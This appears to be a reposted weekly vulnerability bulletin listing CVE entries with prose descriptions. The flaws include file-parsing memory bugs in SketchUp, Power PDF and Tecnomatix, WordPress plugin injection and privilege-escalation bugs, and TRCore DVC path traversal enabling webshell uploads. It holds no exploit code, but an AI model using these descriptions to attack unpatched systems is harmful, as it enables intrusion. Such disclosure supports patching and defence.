Trimble SketchUp Pro SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23885. | 2024-11-22 | not yet calculated | CVE-2024-9713 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24097. | 2024-11-22 | not yet calculated | CVE-2024-9714 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24098. | 2024-11-22 | not yet calculated | CVE-2024-9715 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24100. | 2024-11-22 | not yet calculated | CVE-2024-9716 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Uninitialized Variable Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24101. | 2024-11-22 | not yet calculated | CVE-2024-9717 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24102. | 2024-11-22 | not yet calculated | CVE-2024-9718 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24103. | 2024-11-22 | not yet calculated | CVE-2024-9719 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24104. | 2024-11-22 | not yet calculated | CVE-2024-9720 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24105. | 2024-11-22 | not yet calculated | CVE-2024-9721 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24106. | 2024-11-22 | not yet calculated | CVE-2024-9722 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24107. | 2024-11-22 | not yet calculated | CVE-2024-9723 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24108. | 2024-11-22 | not yet calculated | CVE-2024-9724 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24109. | 2024-11-22 | not yet calculated | CVE-2024-9725 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24110. | 2024-11-22 | not yet calculated | CVE-2024-9726 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24111. | 2024-11-22 | not yet calculated | CVE-2024-9727 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24112. | 2024-11-22 | not yet calculated | CVE-2024-9728 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24144. | 2024-11-22 | not yet calculated | CVE-2024-9729 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24146. | 2024-11-22 | not yet calculated | CVE-2024-9730 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24145. | 2024-11-22 | not yet calculated | CVE-2024-9731 |
| n/a -- n/a |
Tungsten Automation Power PDF JP2 File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24468. | 2024-11-22 | not yet calculated | CVE-2024-9751 |
| n/a -- n/a |
Tungsten Automation Power PDF JPG File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24469. | 2024-11-22 | not yet calculated | CVE-2024-9752 |
| n/a -- n/a |
Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24470. | 2024-11-22 | not yet calculated | CVE-2024-9753 |
| n/a -- n/a |
Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24471. | 2024-11-22 | not yet calculated | CVE-2024-9754 |
| n/a -- n/a |
Tungsten Automation Power PDF JP2 File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24472. | 2024-11-22 | not yet calculated | CVE-2024-9755 |
| n/a -- n/a |
Tungsten Automation Power PDF JP2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24473. | 2024-11-22 | not yet calculated | CVE-2024-9757 |
| n/a -- n/a |
Tungsten Automation Power PDF AcroForm Annotation Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24474. | 2024-11-22 | not yet calculated | CVE-2024-9758 |
| n/a -- n/a |
Tungsten Automation Power PDF GIF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of GIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24475. | 2024-11-22 | not yet calculated | CVE-2024-9759 |
| n/a -- n/a |
Tungsten Automation Power PDF PNG File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PNG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24476. | 2024-11-22 | not yet calculated | CVE-2024-9760 |
| n/a -- n/a |
Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24477. | 2024-11-22 | not yet calculated | CVE-2024-9761 |
| n/a -- n/a |
Tungsten Automation Power PDF OXPS File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of OXPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24478. | 2024-11-22 | not yet calculated | CVE-2024-9762 |
| n/a -- n/a |
Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24479. | 2024-11-22 | not yet calculated | CVE-2024-9763 |
| n/a -- n/a |
Tungsten Automation Power PDF PDF File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24480. | 2024-11-22 | not yet calculated | CVE-2024-9764 |
| n/a -- n/a |
Wacom Center WTabletServicePro Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Center. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within WTabletServicePro process. By creating a symbolic link, an attacker can abuse the service to create a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-24304. | 2024-11-22 | not yet calculated | CVE-2024-9766 |
| n/a -- n/a |
IrfanView SID File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SID files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23277. | 2024-11-22 | not yet calculated | CVE-2024-9767 |
| n/a -- n/a |
The Formidable Forms WordPress plugin before 6.14.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-11-21 | not yet calculated | CVE-2024-9768 |
| n/a -- n/a |
The Taskbuilder WordPress plugin before 3.0.5 does not sanitize user input into the 'load_orders' parameter and uses it in a SQL statement, allowing high privilege users such as admin to perform SQL Injection attacks | 2024-11-21 | not yet calculated | CVE-2024-9828 |
| n/a -- n/a |
The Bard theme for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.216. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-19 | not yet calculated | CVE-2024-9830 |
| n/a -- n/a |
Okta Privileged Access server agent (SFTD) versions 1.82.0 to 1.84.0 are affected by a privilege escalation vulnerability when the sudo command bundles feature is enabled. To remediate this vulnerability, upgrade the Okta Privileged Access server agent (SFTD) to version 1.87.1 or greater. | 2024-11-21 | not yet calculated | CVE-2024-9875 |
| n/a -- n/a |
The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the MJ_gmgt_add_staff_member() function in all versions up to, and including, 67.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to create new user accounts with the administrator role. | 2024-11-23 | not yet calculated | CVE-2024-9941 |
| n/a -- n/a |
The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the MJ_gmgt_user_avatar_image_upload() function in all versions up to, and including, 67.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2024-11-23 | not yet calculated | CVE-2024-9942 |
| qualcomm -- wsa8835_firmware |
Possible out of bound access in audio module due to lack of validation of user provided input. | 2024-11-22 | not yet calculated | CVE-2021-30299 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain an out of bounds write vulnerability when parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24231) | 2024-11-18 | not yet calculated | CVE-2024-52565 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain an out of bounds write vulnerability when parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24233) | 2024-11-18 | not yet calculated | CVE-2024-52566 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24237) | 2024-11-18 | not yet calculated | CVE-2024-52567 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain a use-after-free vulnerability that could be triggered while parsing specially crafted WRL files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-24244) | 2024-11-18 | not yet calculated | CVE-2024-52568 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain an out of bounds write vulnerability when parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24260) | 2024-11-18 | not yet calculated | CVE-2024-52569 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain an out of bounds write vulnerability when parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24365) | 2024-11-18 | not yet calculated | CVE-2024-52570 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain an out of bounds write vulnerability when parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24485) | 2024-11-18 | not yet calculated | CVE-2024-52571 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain an out of bounds write vulnerability when parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24521) | 2024-11-18 | not yet calculated | CVE-2024-52573 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24543) | 2024-11-18 | not yet calculated | CVE-2024-52574 |
| trcore -- dvc |
The DVC from TRCore has a Path Traversal vulnerability, allowing unauthenticated remote attackers to exploit this vulnerability to read arbitrary system files. | 2024-11-18 | not yet calculated | CVE-2024-11309 |
| trcore -- dvc |
The DVC from TRCore has a Path Traversal vulnerability, allowing unauthenticated remote attackers to exploit this vulnerability to read arbitrary system files. | 2024-11-18 | not yet calculated | CVE-2024-11310 |
| trcore -- dvc |
The DVC from TRCore has a Path Traversal vulnerability and does not restrict the types of uploaded files. This allows unauthenticated remote attackers to upload arbitrary files to any directory, leading to arbitrary code execution by uploading webshells. | 2024-11-18 | not yet calculated | CVE-2024-11311 |
| trcore -- dvc |
The DVC from TRCore has a Path Traversal vulnerability and does not restrict the types of uploaded files. This allows unauthenticated remote attackers to upload arbitrary files to any directory, leading to arbitrary code execution by uploading webshells. | 2024-11-18 | not yet calculated | CVE-2024-11312 |
| trcore -- dvc |
The DVC from TRCore has a Path Traversal vulnerability and does not restrict the types of uploaded files. This allows unauthenticated remote attackers to upload arbitrary files to any directory, leading to arbitrary code execution by uploading webshells. | 2024-11-18 | not yet calculated | CVE-2024-11313 |
| trcore -- dvc |
The DVC from TRCore has a Path Traversal vulnerability and does not restrict the types of uploaded files. This allows unauthenticated remote attackers to upload arbitrary files to any directory, leading to arbitrary code execution by uploading webshells. | 2024-11-18 | not yet calculated | CVE-2024-11314 |
| trcore -- dvc |
The DVC from TRCore has a Path Traversal vulnerability and does not restrict the types of uploaded files. This allows unauthenticated remote attackers to upload arbitrary files to any directory, leading to arbitrary code execution by uploading webshells. | 2024-11-18 | not yet calculated | CVE-2024-11315 |
Vulnerability Summary for the Week of November 11, 2024
Posted on Tuesday November 19, 2024
High Vulnerabilities
Medium Vulnerabilities
Low Vulnerabilities
Severity Not Yet Assigned
請即與我們聯絡: fix@hk-computer-repair.com
有用連結:
